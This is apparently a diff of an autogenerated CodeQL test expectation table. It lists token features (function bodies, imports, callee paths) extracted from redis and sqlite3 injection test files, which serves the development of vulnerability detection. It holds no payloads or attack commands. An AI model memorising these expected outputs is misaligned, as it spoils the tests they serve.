enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:33 | client.unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:33 | client.unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | client. ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | exceptional return of client. ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | exceptional return of client. ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | exceptional return of client. ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | exceptional return of client. ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:18:49:47 | exceptional return of client. ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:25:49:33 | unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:25:49:33 | unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:25:49:33 | unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:25:49:33 | unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:25:49:33 | unrelated | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:35:49:37 | key | CalleeFlexibleAccessPath | client.unrelated | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:35:49:37 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:35:49:37 | key | calleeImports | redis | @@ -4281,6 +20483,56 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:40:49:46 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:40:49:46 | "value" | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:49:40:49:46 | "value" | receiverName | client | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:19 | unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:19 | unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:19 | unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:19 | unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:19 | unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelat ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelat ... client) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelat ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelat ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelat ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelated | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:11:51:59 | unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:31 | promisify | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:31 | promisify | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:31 | promisify | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:31 | promisify | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:31 | promisify | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | exceptional return of promisi ... foobar) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | exceptional return of promisi ... foobar) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | exceptional return of promisi ... foobar) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | exceptional return of promisi ... foobar) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | exceptional return of promisi ... foobar) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | promisi ... foobar) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | promisi ... foobar) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | promisi ... foobar) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | promisi ... foobar) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:46 | promisi ... foobar) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:51 | promisi ... r).bind | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:51 | promisi ... r).bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:51 | promisi ... r).bind | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:51 | promisi ... r).bind | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:51 | promisi ... r).bind | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | exceptional return of promisi ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | exceptional return of promisi ... client) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | exceptional return of promisi ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | exceptional return of promisi ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | exceptional return of promisi ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | promisi ... client) | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | promisi ... client) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | promisi ... client) | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | promisi ... client) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:23:51:59 | promisi ... client) | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:38 | client | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:38 | client | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:38 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:38 | client | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:38 | client | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | CalleeFlexibleAccessPath | promisify | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | calleeImports | util | @@ -4289,6 +20541,16 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:33:51:45 | client.foobar | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:40:51:45 | foobar | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:40:51:45 | foobar | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:40:51:45 | foobar | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:40:51:45 | foobar | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:40:51:45 | foobar | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:48:51:51 | bind | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:48:51:51 | bind | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:48:51:51 | bind | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:48:51:51 | bind | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:48:51:51 | bind | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | CalleeFlexibleAccessPath | promisify().bind | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | calleeImports | util | @@ -4297,6 +20559,31 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:51:53:51:58 | client | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:14 | foo4 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:14 | foo4 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:14 | foo4 | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:14 | foo4 | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:14 | foo4 | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:40 | foo4 = ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:40 | foo4 = ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:40 | foo4 = ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:40 | foo4 = ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:11:52:40 | foo4 = ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:26 | unrelated | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:26 | unrelated | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:26 | unrelated | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:26 | unrelated | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:26 | unrelated | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | exceptional return of unrelat ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | exceptional return of unrelat ... value") | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | exceptional return of unrelat ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | exceptional return of unrelat ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | exceptional return of unrelat ... value") | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | unrelat ... value") | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | unrelat ... value") | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | unrelat ... value") | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | unrelat ... value") | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:18:52:40 | unrelat ... value") | fileImports | body-parser express redis util | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key | CalleeFlexibleAccessPath | unrelated | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:28:52:30 | key | calleeImports | util | @@ -4313,24 +20600,148 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:33:52:39 | "value" | enclosingFunctionBody | req res key req body key client set key value setAsync promisify client set bind client foo1 setAsync key value client setAsync promisify client set foo2 client setAsync key value client unrelated promisify foo3 client unrelated key value unrelated promisify client foobar bind client foo4 unrelated key value | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:33:52:39 | "value" | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/redis.js:52:33:52:39 | "value" | fileImports | body-parser express redis util | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:0 | this | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:0 | this | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | db | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:1:1:1:1 | require | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:11 | express | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:11 | express | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:11 | express | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:32 | express ... press') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:32 | express ... press') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:5:4:32 | express ... press') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:21 | require | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | exceptional return of require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | exceptional return of require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | exceptional return of require('express') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | require('express') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | require('express') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:15:4:32 | require('express') | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:4:23:4:31 | 'express' | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:11 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:11 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:11 | sqlite3 | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:5:5:42 | sqlite3 ... rbose() | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:21 | require | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:21 | require | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | exceptional return of require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | exceptional return of require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | exceptional return of require('sqlite3') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | require('sqlite3') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | require('sqlite3') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:32 | require('sqlite3') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:40 | require ... verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:40 | require ... verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:40 | require ... verbose | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | exceptional return of require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | exceptional return of require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | exceptional return of require ... rbose() | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | require ... rbose() | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | require ... rbose() | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:15:5:42 | require ... rbose() | fileImports | express socket.io sqlite3 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | CalleeFlexibleAccessPath | require | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | calleeImports | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | contextFunctionInterfaces | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:23:5:31 | 'sqlite3' | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:34:5:40 | verbose | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:34:5:40 | verbose | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:5:34:5:40 | verbose | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:6 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:6 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:6 | db | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db = ne ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db = ne ... mory:') | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:5:6:41 | db = ne ... mory:') | fileImports | express socket.io sqlite3 | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | exceptional return of new sql ... mory:') | contextFunctionInterfaces | | +| autogenerated/NosqlAndSqlInjection/untyped/socketio.js:6:10:6:41 | exceptional return of new sql ... mory:') | contextSurroundingFunctionParameters | | +| 